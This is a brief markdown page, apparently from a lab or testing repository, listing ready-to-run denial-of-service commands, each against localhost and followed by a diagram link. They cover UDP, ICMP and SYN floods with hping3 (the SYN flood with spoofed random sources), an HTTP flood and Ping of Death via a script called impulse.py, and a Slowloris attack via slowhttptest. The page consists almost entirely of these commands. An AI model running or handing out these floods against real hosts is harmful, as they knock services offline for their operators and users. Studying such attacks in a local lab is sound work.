**UDP flood**
hping3 -2 --flood localhost

![Scheme](images/upd-flood.png)

**ICMP flood**
hping3 -1 --flood localhost

![Scheme](images/icmp-flood.png)

**Http flood**
python impulse.py --method HTTP --target localhost

![Scheme](images/http-flood.png)

**Slowloris**
slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u http://localhost -x 24 -p 2

![Scheme](images/slowloris.png)

**SYN flood**
hping3 -c 1000 -d 120 -w 120 -p 80 --flood --rand-source localhost

![Scheme](images/SYN-flood.png)

**POD**
python impulse.py --method POD --target 127.0.0.1:80

![Scheme](images/POD.png)

